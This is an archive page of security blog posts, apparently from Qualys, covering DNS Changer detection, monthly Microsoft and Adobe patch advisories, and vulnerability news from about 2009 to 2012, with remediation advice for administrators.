All Posts

33 posts

Detecting the DNS Changer Malware

Only a couple of days left until the DNS Changer Working Group will stop operating the DNS servers used by the DNS Change malware. According to the latest stats there are still 300,000 machines infected. These machines will lose Internet access once the servers are shut down.

You can use BrowserCheck to check whether you are in the affected group.

January marked half-time for the folks at the DNS Changer Working Group (DCWG) who are now running the DNS servers originally used in the Rove botnet. Ever since a multi-national task force dismantled the gang in Operation Ghost Click in early November of 2011, the DCWG has been in charge of running the servers at the heart of the botnet in order to keep the infected machines that depend on these servers. In its four years of existence, Rove managed to infect around four millions machines. Its mode of operation is simple: it replaces the DNS servers registered on the infected machine with its own servers, which allows it to redirect almost all of the traffic of the infected machines to its own services. This gives the attackers almost unlimited power over the infected machines, as they intercept almost all requests made to the Internet. They could for example, replace all download requests for a certain software, say iTunes, with a backdoor’d version of iTunes, that for all effects and purposes behaves the same, but installs for the attackers an additional remote administration tool. They were also able to reorder your search results and influence your purchase decisions, and to exchange the ads that are displayed to you favoring their affiliates.

But the DCWG’s mission is time-limited. In November they were tasked operate the servers for a total of 120 days. They will shutdown the servers in March and anybody who is still using those servers will then lose access to the Internet, as DNS is the service that translates your requests for a certain website, say "," into its IP address equivalent: Once DNS stops working you will get a screen similar to:

Address not valid - Windows Internet Explorer

Fortunately it is relatively easy to verify whether a machine is affected by Rove. All one needs to do is verify whether its DNS servers fall into the five ranges that were under control of the Rove operators. The easiest way to do this, at least under Windows is to run the Qualys BrowserCheck plug-in which we recently equipped with Rove detection capabilities (see screenshot)

Qualys BrowserCheck - DNS Changer Malware Detected

If your machine shows as insecure under the DNS Changer heading, you need to perform a few simple steps to correct the situation. We provide more information on how to correct the DNS servers by clicking on the FixIt button, but basically you need to reset the DNS servers that you use. On Windows the Control Panel is used to modify the DNS servers. Click on Start, Control Panel, Network Connections, then right click on the icon that identifies your connection, and select Properties, then select Internet Protocol (TCP/IP) and click on the Properties button. This will bring you to the screen where the DNS servers are set. Here you should select Obtain DNS server address automatically and then close the Windows by pressing Ok and Close.

Internet Protocol TCP/IP Properties for Network Connection in Windows XP

Once done you should register the infection at the FBI’s website, as it will help strengthen the case against Rove’s operators.

January 2012 Patch Tuesday

2012’s first Patch Tuesday has seven bulletins, including the postponed bulletin from December 2011 that addresses the BEAST style information disclosure. Talking about changes in schedules, Microsoft also released a bulletin MS11-100 for ASP.NET originally planned for this January between Christmas and New Years of 2011, which you might have missed.

Our highest priority is MS12-004, which fixes two vulnerabilities in Windows Media Player, one critical in MIDI playing, one important in the closed caption (CC) interpretation. The vulnerabilities are relatively easy to trigger and require a specially crafted media input file. Attacks against these vulnerability can be both through e-mail or hosting the media file on a website. They have the potential to be used in a drive-by-download attack.

Next on our list is MS12-005, a vulnerability in the Windows .NET packager that can be triggered through a malicious Microsoft Office Word or PowerPoint document. Microsoft rates it only as 'important', but we consider vulnerabilities that only rely on a user opening a file critical enough to move them up in priority.

MS12-006 is the mentioned fix for the BEAST attack and should be deployed on all of your webservers. BEAST was first demonstrated at the September 2011 Ekoparty conference in Buenos Aires and is a crypto attack against SSL/TLS that allows the attacker to decode and eavesdrop on HTTPS sessions. If you did miss the MS11-100 release over the holidays, now is a good time to take the opportunity to bundle both together. Tools for triggering MS11-100 are actively being researched and are very simple to build, meaning that they will soon get added to the common DoS tools, maybe even to the one advertised here by Crista ( via @mikko).

MS12-001 is the bulletin that was tagged as addressing a 'Security Feature Bypass' flaw. This is a new category and Microsoft has written a blog post explaining the details involved. In summary: a certain version of Visual-C (2003 RTM) implemented the the SAFESEH security measure in a way that Windows XP, 2003, Vista, Win7 and 2008 were unable to read the information and fell back to run the binary without the SAFESEH handler. Binaries compiled with the later versions of Visual-C (starting with SP1) are generated correctly and MS12-001 now changes the affected Windows Operating systems to be able to read the older format as well. There is no direct vulnerability here, but an attacker would have to identify a software compiled with the old version of Visual-C, find a vulnerability in it and code an exploit that would use the SEH exploit mechanism. Install it when you can, as it is a useful defense-in-depth measure.

Please also take a look at Adobe’s release today of a new version of Adobe Reader 9 and X. It will cover CVE-2011-4369 for Adobe Reader X, which they had already addressed for Adobe Reader 9 out-of-band due to exploits in the wild on December 16th plus a security enhancement that allows for better control of embedded JavaScript.

2011 Year in Review, Trends for 2012

Tony Bradley published yesterday a blog entry that contains a great summary of the top security incidents of 2011. This is worth reading for any IT administrator as these attacks will grow in 2012 and if you are like me, you may agree that one always learns better by looking at real-life examples.

Tony Bradley, The Security Detail at TechTarget

Adobe Patch for Newest Reader 0-day

Adobe today released a patch for a flaw (CVE-2011-2462) in Adobe Reader 9. The flaw is actively being used in targeted attacks and can be used to take full control of the targeted machine. If you are interested in the technical details, one of the samples has been analyzed in detail by Brandon Dixon and Mila Parkour.

We recommend applying this patch as quickly as possible.

Adobe Reader X contains the same flaw, but the current attack is neutralized due its additional sandbox. While this does not mean that Adobe Reader X users are completely safe, it is a remarkable illustration of the effectiveness of the additional security features that newer products have been enhanced with.

The designers of Google’s Chrome browser spent a considerable amount of time on its sandboxing capabilities (see here for a illustrated walk-through on some of the design choices) and it has been quite effective – we do not know of any publicly disclosed attacks against Google’s browser at this time.

There is a great technical evaluation of security in browsers available at Accuvant, and, while it is was funded by Google, the technical insight it provides is valuable. It’s a very enjoyable technical read, written by some of the industry’s brightest security engineers. Hopefully you have time to look at it over the holidays.

Fixing Java Vulnerabilities By Industry Collaboration

Malware operators are always looking for new ways to allow their programs to take control over additional machines. Their primary targets are Windows based machines, because they have the largest install base. However, the operating system has become increasingly difficult to attack, so exploit writers have focused their attention on critical vulnerabilities in 3rd party applications. These 3rd party vulnerabilities usually require user interaction (i.e. browse to a certain web page, open an e-mail, play a media file) to be successfully exploited, but malware operators have been able to get high conversion rates by using social engineering techniques and planting their attacks on trusted web sites. While the first wave of these exploits focused on Windows Office and the second wave on Adobe Reader and Flash products, we are now seeing an increased attention on Java – Java attends to the basic characteristics: it is a widely installed, it has a set of well known vulnerabilities and it has been largely ignored by IT administrators for patching.

Through our BrowserCheck application we have collected data that shows that over 80% of all visiting workstations have Java installed. Of these machines over 40% run a version of Java that has a critical vulnerability, making it the most vulnerable plug-in of all and giving the malware a excellent chance to install itself and control the targeted machine.

A possible solution is to include Java in an existing automated update process. It would be ideal if Oracle/Sun could collaborate with Microsoft to use the well established and robust WSUS update process to distribute fixes to Java. If this mechanism could then be extended to all major software vendors, the Internet would become increasingly safer to use for all of us.


Additional September Security Advisories – Update


  • Twitter today fixed an XSS vulnerability that was triggered by hovering over a link on their website. The vulnerability had been fixed some time ago, but was unwillingly reintroduced in a recent update. Today it was disclosed again and spread quite quickly. Twitter has more info in their post here.
    Minded Security has an interesting analysis of an additional issue in the used JavaScript code and shows that finding a valid fix that works across all browsers requires experience and structured QA testing. Mikko Hypponen suggests that twitter implements a bounty based program, but it seems that the problems are much lower in the dev/testing stack.

After last week’s patch Tuesday a few high profile vulnerabilities and patches have appeared this week:

  • Adobe accelerated their patch for the Flash 0-day vulnerability by one week and came out with it yesterday, Monday September 20. Google Chrome users got the patch through Chrome’s update mechanism and received it even earlier on Friday, September 17. Google Chrome users can also use the Chrome-embedded PDF reader for most of their PDF usage, at least the simpler document viewing/printing and escape from the still open Adobe Reader 0-day.
  • Samba, the popular filesharing server issued a patch for a critical vulnerability . The vulnerability allows external users to cause a DOS condition and potentially take over control of the Samba server. Most users will run a version of Samba supplied by their vendor and should contact them for the updates, i.e. RedHat, IBM, Apple etc.
  • An exploit for a vulnerability in the 64 bit Linux kernel was published. The vulnerability allows a local user to take full control over the targeted machine. Limited reports of use of the exploit are coming in. A tool has been made available to detect infection. Engage your vendor for a patch.
  • Web applications that use Microsoft’s are vulnerable to an "oracle padding" attack against application cookies which allows the attacker to gain access to private information. There is a demo video online on YouTube. Microsoft issued security advisory KB2416728 and has acknowledged a limited number of attacks seen in the wild. The advisory contains workarounds that mitigate the information leak. Web application firewalls with the technology to protect application cookies can also help with the issue
  • Apple published an update to Mac OS X 10.6 (Snow Leopard) fixing a single issue, which is quite uncommon as they normally bundle many security updates together. Earlier versions of Mac OS X are not affected. Quicktime for Windows was updated as well to address a known 0-day vulnerability.
  • Twitter today fixed an XSS vulnerability that was triggered by hovering over a link on their website. The vulnerability had been fixed some time ago, but was unwillingly reintroduced in a recent update. Today it was disclosed again and spread quite quickly. Twitter has more info in their post here.

Microsoft issues out of band update for LNK

Microsoft will issue an out-of-band update next Monday, August 2nd. The update will address the critical LNK vulnerability that applies to all versions of the Windows Operating system, from Windows XP SP3 to Windows 7.

Microsoft’s decision to issue this upgrade before the normal Patch Tuesday on August 10 is due to reports of increasing number of attacks that use the LNK flaw.

Windows 2000 and XP SP2 users will not be covered and are now in a predicament that will become increasingly urgent. Attacks will continue to become more prevalent and their defensive options are limited. Microsoft’s work-around in Advisory KB2286198 has a serious impact on the usability of the system as desktop icons are all replaced by standard generic representations and navigation is hampered. The best option for XP SP2 users is to upgrade to SP3 as soon as possible, Windows 2000 users need to migrate to a new OS alltogether.

Primary attack vectors for the LNK vulnerability are USB sticks and shared drives, ahe attack depends on a specially crafted LNK file and a custom DLL to function. Remote attacks through e-mail or websites are theoretically possible, but require multiple steps and user interaction. Nevertheless disabling SMB and WebDAV protocols in the outbound ruleset of internet facing firewalls is a measure that provides additional protection against the remote attack vector.

CSA Top Threat Report Coming

For the last couple of months we have participated in the Cloud Security Alliance’s project "Top Threats to Cloud Computing". A first version will be published at RSA 2010 at the Cloud Security Alliance Summit during RSA 2010.

Please help us with this effort by completing the Top Threats Survey. The survey takes about 5 minutes to complete and will help us understand whether we are on the right track with the areas covered.

The idea is to present summarized results of this survey at RSA. The project will continue to evolve after the conference as we incoporate your feedback.

Come see the results at the Cloud Security Alliance Summit !

SMB2 – 8 Days From 0-day To Exploit

Security Researchers at Immunity have released today an exploit for the SMB2 flaw in Vista/2008, as reported today by The Register’s Dan Goodin. The code is available under the Canvas Early Updates program and a paid subscription is needed to access it.

The Exploit works on all versions of Vista and Windows 2008 with the exception of 2008 R2. Microsoft has described in this advisory a workaround, amounting to turning off SMB2. The implementation of this workaround is now becoming critical as attackers will have access to the code soon, in the most optimistic case next week when HDMoore thinks that Metasploit will have the exploit implemented.

Firefox browser to check for Flash updates

Yesterday the Mozilla foundation announced on their security blog that Firefox will start checking for outdated Flash plug-ins. This is a great way of improving the security of web browsers, Flash is often used by attackers to exploit client machines and unfortunately notoriously difficult to update, requiring (on Windows) different update packages for Internet Explorer and all other browsers.

Now we just need to convince Hillary Clinton to let the Department of State use Firefox.

Firefox warning to update Adobe Flash

As you can see this worked fine for me on my Mac under Firefox 3.0.14.